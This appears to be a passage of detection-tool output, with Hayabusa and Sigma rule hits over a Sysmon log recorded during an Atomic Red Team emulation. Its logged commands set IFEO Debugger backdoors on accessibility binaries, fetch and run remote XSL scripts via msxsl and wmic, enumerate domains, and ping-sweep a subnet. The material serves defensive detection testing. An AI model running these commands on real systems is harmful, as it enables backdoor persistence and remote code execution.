2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6116 | PGUID: 747F3D96-D8A5-5D31-0000-0010C0A03200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D8A6-5D31-0000-001053A73200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6664 | PGUID: 747F3D96-D8A6-5D31-0000-0010F9B13200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D8A9-5D31-0000-001072C43200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6016 | PGUID: 747F3D96-D8AA-5D31-0000-0010C0C93200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6244 | PGUID: 747F3D96-D8AB-5D31-0000-001054D03200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1888 | PGUID: 747F3D96-D8AB-5D31-0000-0010A4D53200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49727 (MSEDGEWIN10.home) | Dst: 172.217.17.132:80 (ams15s30-in-f4.1e100.net) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D8CA-5D31-0000-0010DA413300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6268 | PGUID: 747F3D96-D8CA-5D31-0000-0010CF443300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D8CC-5D31-0000-001038513300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1852 | PGUID: 747F3D96-D8CD-5D31-0000-001047543300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D8CF-5D31-0000-00109B603300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:list | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D8D0-5D31-0000-0010F3623300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D8D0-5D31-0000-001034673300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5340 | PGUID: 747F3D96-D8DA-5D31-0000-0010D3833300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D8DA-5D31-0000-001029863300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D8DA-5D31-0000-00100D8A3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4856 | PGUID: 747F3D96-D8DD-5D31-0000-0010EF923300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view /domain | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | LID: 0x50951 | PID: 3012 | PGUID: 747F3D96-D8DD-5D31-0000-001043953300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 
| PID: 1988 | PGUID: 747F3D96-D8EA-5D31-0000-001030B63300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | LID: 0x50951 | PID: 4684 | PGUID: 747F3D96-D8EA-5D31-0000-00108AB83300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-D8F6-5D31-0000-00100FCB3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4528 | PGUID: 
747F3D96-D8F6-5D31-0000-001091D13300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.1 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3876 | PGUID: 747F3D96-D8F7-5D31-0000-0010EDD33300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.2 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2084 | PGUID: 747F3D96-D8F7-5D31-0000-0010E3D83300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.3 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D8F7-5D31-0000-0010A7E13300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.4 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 
0x50951 | PID: 4376 | PGUID: 747F3D96-D8F8-5D31-0000-00108FE43300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.5 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D8F9-5D31-0000-00108BE73300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.6 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D8F9-5D31-0000-001073EA3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.7 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D8FA-5D31-0000-00105BED3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.8 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 
